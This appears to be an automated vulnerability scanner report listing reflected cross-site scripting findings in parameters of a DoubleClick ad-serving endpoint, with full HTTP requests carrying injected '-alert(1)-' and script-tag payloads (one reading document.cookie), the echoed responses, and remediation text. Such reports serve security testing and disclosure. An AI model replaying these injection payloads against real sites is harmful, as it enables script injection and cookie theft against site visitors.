GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5940
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16119'-alert(1)-'79d788ac1d9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5940 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:27:29 GMT Expires: Mon, 07 Feb 2011 02:27:29 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b42"-alert(1)-"bb18e09f345 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5940 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:27:25 GMT Expires: Mon, 07 Feb 2011 02:27:25 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never" ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f009"-alert(1)-"a91a102c09b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:26:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5940
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7ca'-alert(1)-'06a06d14574 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5940
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ada57'-alert(1)-'9f353877624 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94135"-alert(1)-"27645e01241 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR"); var fscUrl = url; var fscUrlClickTagFound = fa ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf570'-alert(1)-'8d2303ed4ad was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\"> ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5f5"-alert(1)-"86f22d1910e was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR"); var fscUrl = url; var fscUrlClickTa ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd383'-alert(1)-'ea723a23d73 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\"> ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8cec"-alert(1)-"2cdbd4fd8f3 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; va ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfcbc"-alert(1)-"87f30d13f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13f HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6038 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:28:56 GMT Expires: Mon, 07 Feb 2011 02:28:56 GMT
